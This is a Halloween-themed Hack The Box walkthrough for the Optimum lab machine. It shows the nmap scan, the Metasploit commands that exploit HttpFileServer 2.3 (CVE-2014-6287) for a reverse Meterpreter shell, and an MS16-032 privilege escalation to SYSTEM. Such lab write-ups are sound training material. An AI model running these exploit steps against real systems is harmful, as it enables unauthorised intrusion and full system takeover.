My writeup for the HTB machine Optimum!
🎃 HTB Optimum - Spooky Edition 🦇 A Halloween-themed walkthrough for Hack The Box's Optimum machine
Spooky Hacking
👻 Introduction Welcome, brave hacker, to the Haunted Server of Optimum! This eerie Windows machine hides dark secrets—a vulnerable HttpFileServer (HFS) waiting to unleash its demons. Your mission? Exploit it, escalate privileges, and uncover the ghostly flags hidden in its shadowy depths.
Difficulty: 👻👻👻👻👻 (Easy) Operating System: Windows (Server 2012 R2) Author: Lantern Tools Used: nmap, Metasploit, Exploit-DB
🕵️ Enumeration: Unmasking the Phantom Service
- Port Scanning with nmap We start by probing the haunted server with nmap:
nmap -sV -sC -oA nmap/optimum_spooky 10.10.10.8Findings:
Port 80 (HTTP): A cursed HttpFileServer 2.3 lurks here.
CVE-2014-6287: This version has a Remote Code Execution (RCE) vulnerability—perfect for summoning a reverse shell!
💀 Exploitation: Raising the Dead (Shell) 2. Summoning a Meterpreter Shell We invoke Metasploit to exploit the haunted HFS:
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set LHOST <YOUR_IP>
exploit
If successful:
A Meterpreter session rises from the digital grave!
Check your access:
meterpreter > getuidServer username: OPTIMUM\kostas (The Lost User) 3. Collecting the First Soul (User Flag) Navigate to Kostas’ forsaken desktop and claim the user flag:
meterpreter > shell
type C:\Users\kostas\Desktop\user.txt👑 Privilege Escalation: Becoming the Lich King (SYSTEM) 4. Checking the Haunted System Before ascending, we must know our enemy:
meterpreter > sysinfo- Exploiting the Forgotten Curse (MS16-032) We exploit a secondary logon handle vulnerability to become SYSTEM:
background
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set LHOST <YOUR_IP>
exploit
Success? You are now nt authority\system—the Overlord of Optimum!
- Claiming the Final Soul (Root Flag) Enter the Administrator’s lair and seize the root flag:
shell
type C:\Users\Administrator\Desktop\root.txt
🎃 Conclusion: The Curse is Lifted! You’ve conquered the haunted Optimum machine! Here’s what we learned: ✔ Exploiting outdated services can open spectral gateways. ✔ Windows privilege escalation is like stealing a lich’s phylactery. ✔ Always check for known CVEs—they’re the ghosts of past mistakes.
🔮 Bonus: Spooky Tips for Future Haunts Alternative Exploits: If MS16-032 fails, try bypassuac_eventvwr.
Manual Checks:
whoami /priv # Check for weak permissions
systeminfo # Find missing patches🕯️ Final Words Happy hacking, and beware the ghosts of unpatched systems! 🎃
👻 Want more spooky walkthroughs? ⭐ Star this repo & follow for hauntingly good content!